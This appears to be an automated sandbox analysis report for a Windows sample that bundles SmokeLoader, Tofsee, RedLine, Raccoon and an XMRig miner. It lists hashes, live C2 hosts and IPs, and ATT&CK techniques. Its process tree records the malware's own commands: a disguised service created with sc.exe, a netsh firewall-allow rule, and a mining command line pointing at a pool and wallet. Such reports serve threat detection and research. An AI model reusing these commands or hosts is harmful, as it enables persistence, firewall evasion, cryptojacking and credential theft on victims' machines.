Overview

overview

10

Static

static

83b62ccce9...ed.exe

windows7_x64

10

83b62ccce9...ed.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    20-11-2021 16:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    83b62ccce9d742a53e5fe0016fab9ded.exe

  • Size

    320KB

  • MD5

    83b62ccce9d742a53e5fe0016fab9ded

  • SHA1

    4ec481fc61cb5fa86296975000c25e0eec7376b9

  • SHA256

    c41ecbb533f6da059e2996cc5065805d2038ba4d0e670d57939b30b109bd6eba

  • SHA512

    5116417b66769ee983a2b27ad611b1488e7643e6189fc4c2322a76658ecd6c70edc557faf5021a366cc135e96f4014ba25486f486fd203437d9f123e449714a4

Score
10/10
raccoonredlinesmokeloadertofseexmrigddf183af4241e3172885cf1b2c4c1fb4ee03d05abackdoordiscoveryevasioninfostealerminerpersistencespywarestealertrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-file-host6.com/

http://host-host-file8.com/
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

C2

185.159.80.90:38637

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

ddf183af4241e3172885cf1b2c4c1fb4ee03d05a

Attributes
  • url4cnc

    http://91.219.236.27/capibar

    http://5.181.156.92/capibar

    http://91.219.236.207/capibar

    http://185.225.19.18/capibar

    http://91.219.237.227/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe
    "C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe
      "C:\Users\Admin\AppData\Local\Temp\83b62ccce9d742a53e5fe0016fab9ded.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1192
  • C:\Users\Admin\AppData\Local\Temp\8A45.exe
    C:\Users\Admin\AppData\Local\Temp\8A45.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Users\Admin\AppData\Local\Temp\8A45.exe
      C:\Users\Admin\AppData\Local\Temp\8A45.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:436
  • C:\Users\Admin\AppData\Local\Temp\9915.exe
    C:\Users\Admin\AppData\Local\Temp\9915.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ifvqrlb\
      2⤵
        PID:1184
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\skcjizkr.exe" C:\Windows\SysWOW64\ifvqrlb\
        2⤵
          PID:2012
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ifvqrlb binPath= "C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d\"C:\Users\Admin\AppData\Local\Temp\9915.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1732
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ifvqrlb "wifi internet conection"
            2⤵
              PID:964
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ifvqrlb
              2⤵
                PID:1604
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:576
              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                C:\Users\Admin\AppData\Local\Temp\A546.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1868
                • C:\Users\Admin\AppData\Local\Temp\A546.exe
                  C:\Users\Admin\AppData\Local\Temp\A546.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1548
              • C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe
                C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe /d"C:\Users\Admin\AppData\Local\Temp\9915.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1000
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:928
              • C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                1⤵
                • Executes dropped EXE
                PID:1760

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Credential Access

              Credentials in Files

              1
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Peripheral Device Discovery

              1
              T1120

              Lateral Movement

              Collection

              Data from Local System

              1
              T1005

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\9915.exe
                MD5

                57f3cfc15761105e6c7ba5ed880c932c

                SHA1

                874dae56e8e259aebefd1c95b31392408b6bd827

                SHA256

                faaf74e50917319bc08d449e69e6c367155e166bc5708d13e9ad808055d9b3a3

                SHA512

                d67e3bf551d4f3644cdd65ff6f04e3b31cff3fcdfac96f5df5fb1e578028e5d9d3c3bc9f83f7f23e6e20b47d25384750414cb1086f5b0e109d0b0537f773e125

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\9915.exe
                MD5

                57f3cfc15761105e6c7ba5ed880c932c

                SHA1

                874dae56e8e259aebefd1c95b31392408b6bd827

                SHA256

                faaf74e50917319bc08d449e69e6c367155e166bc5708d13e9ad808055d9b3a3

                SHA512

                d67e3bf551d4f3644cdd65ff6f04e3b31cff3fcdfac96f5df5fb1e578028e5d9d3c3bc9f83f7f23e6e20b47d25384750414cb1086f5b0e109d0b0537f773e125

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\BC9E.exe
                MD5

                a93ee3be032ac2a200af6f5673ecc492

                SHA1

                a6fb35b4230ae92ae50a2f3a4e7f0ca7341e9f1c

                SHA256

                f106e2efb90c57289bbe57b3be618c063c1bc70f3eaabd2afa73e53c2168a54d

                SHA512

                d4796fda3e4de570d77ffb5dd9efa8172647832e3e2e491d12578d19b9f8de6b876b349f827050f1aa6f6121cf0a5558e4cd4e4c920a33f2f46732b1ca99e321

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\skcjizkr.exe
                MD5

                54eaaa2c29f701c6ca7d700a2ba6a297

                SHA1

                8e1ef74537acd2b037a654ea9a2c8e8d6b3f2294

                SHA256

                d834689765659e64068594877b3f3c8553a224c36cfb820f0264e761af039730

                SHA512

                38c852d52c52b20f270a0fab6b36042defc2a1985767722f8c6695993b68f757bfa34cb00647db004606f0cefbaba0379b5cf4d93be2be120a15edbdb0aa0689

                Download Submit
              • C:\Windows\SysWOW64\ifvqrlb\skcjizkr.exe
                MD5

                54eaaa2c29f701c6ca7d700a2ba6a297

                SHA1

                8e1ef74537acd2b037a654ea9a2c8e8d6b3f2294

                SHA256

                d834689765659e64068594877b3f3c8553a224c36cfb820f0264e761af039730

                SHA512

                38c852d52c52b20f270a0fab6b36042defc2a1985767722f8c6695993b68f757bfa34cb00647db004606f0cefbaba0379b5cf4d93be2be120a15edbdb0aa0689

                Download Submit
              • \Users\Admin\AppData\Local\Temp\8A45.exe
                MD5

                183aeaff3cbbe4991d2211a59221943d

                SHA1

                b312cc8b070b6a6f588d1ad64a81a4e154efc28c

                SHA256

                3acfc103f563564c1375045c97504c574d574ba2574e2348302604274be86d59

                SHA512

                2262cf71e5ea8af1bf4e07640600385a79ea31f40c7cdbe41d9a51f0f9231254233224bd2c87c66443759156fd8f835e0aa0e3b9944ad0b87f551cdf69720beb

                Download Submit
              • \Users\Admin\AppData\Local\Temp\A546.exe
                MD5

                5e34695c9f46f1e69ce731d3b7359c88

                SHA1

                e1e5bb43f0c7556bcccc8cb698f854694bdc024a

                SHA256

                97f96815d81f9c1c8ede31f1c21fda2bee7cbab3490184ef833d9d2e8c17e6fc

                SHA512

                659fa0b695942c35dd4ef499d6c01d9b2a8c23254ea31465a126fd71a0d542ee71da9349ffc8226083393ed37c0668f63c97cc7ef3e014eae793b1f1ba7d6b43

                Download Submit
              • memory/436-67-0x0000000000402DD8-mapping.dmp
                Download
              • memory/576-102-0x0000000000000000-mapping.dmp
                Download
              • memory/928-117-0x0000000000080000-0x0000000000171000-memory.dmp
                Filesize

                964KB

                Download
              • memory/928-118-0x0000000000080000-0x0000000000171000-memory.dmp
                Filesize

                964KB

                Download
              • memory/928-122-0x000000000011259C-mapping.dmp
                Download
              • memory/964-98-0x0000000000000000-mapping.dmp
                Download
              • memory/1000-112-0x00000000000D0000-0x00000000000E5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1000-114-0x00000000000D9A6B-mapping.dmp
                Download
              • memory/1000-113-0x00000000000D0000-0x00000000000E5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/1096-63-0x000000000030B000-0x000000000031C000-memory.dmp
                Filesize

                68KB

                Download
              • memory/1096-61-0x0000000000000000-mapping.dmp
                Download
              • memory/1164-116-0x0000000000400000-0x0000000002B49000-memory.dmp
                Filesize

                39.3MB

                Download
              • memory/1164-59-0x0000000000220000-0x0000000000229000-memory.dmp
                Filesize

                36KB

                Download
              • memory/1164-110-0x000000000030B000-0x000000000031C000-memory.dmp
                Filesize

                68KB

                Download
              • memory/1164-55-0x0000000002C8B000-0x0000000002C9C000-memory.dmp
                Filesize

                68KB

                Download
              • memory/1184-83-0x0000000000000000-mapping.dmp
                Download
              • memory/1192-58-0x0000000076341000-0x0000000076343000-memory.dmp
                Filesize

                8KB

                Download
              • memory/1192-57-0x0000000000402DD8-mapping.dmp
                Download
              • memory/1192-56-0x0000000000400000-0x0000000000409000-memory.dmp
                Filesize

                36KB

                Download
              • memory/1424-60-0x0000000002720000-0x0000000002736000-memory.dmp
                Filesize

                88KB

                Download
              • memory/1424-87-0x0000000003FD0000-0x0000000003FE6000-memory.dmp
                Filesize

                88KB

                Download
              • memory/1548-92-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1548-94-0x0000000000418EEA-mapping.dmp
                Download
              • memory/1548-93-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1548-96-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1548-91-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1548-99-0x00000000008D0000-0x00000000008D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1548-90-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1548-89-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

                Download
              • memory/1604-100-0x0000000000000000-mapping.dmp
                Download
              • memory/1732-88-0x0000000000000000-mapping.dmp
                Download
              • memory/1760-103-0x0000000000000000-mapping.dmp
                Download
              • memory/1760-107-0x0000000000220000-0x000000000026F000-memory.dmp
                Filesize

                316KB

                Download
              • memory/1760-108-0x0000000000330000-0x00000000003BF000-memory.dmp
                Filesize

                572KB

                Download
              • memory/1760-109-0x0000000000400000-0x0000000000491000-memory.dmp
                Filesize

                580KB

                Download
              • memory/1868-80-0x0000000000350000-0x0000000000351000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1868-75-0x0000000000950000-0x0000000000951000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1868-72-0x0000000000000000-mapping.dmp
                Download
              • memory/1936-86-0x0000000000400000-0x0000000002B49000-memory.dmp
                Filesize

                39.3MB

                Download
              • memory/1936-81-0x0000000000220000-0x0000000000233000-memory.dmp
                Filesize

                76KB

                Download
              • memory/1936-78-0x0000000002CAB000-0x0000000002CBC000-memory.dmp
                Filesize

                68KB

                Download
              • memory/1936-70-0x0000000000000000-mapping.dmp
                Download
              • memory/2012-84-0x0000000000000000-mapping.dmp
                Download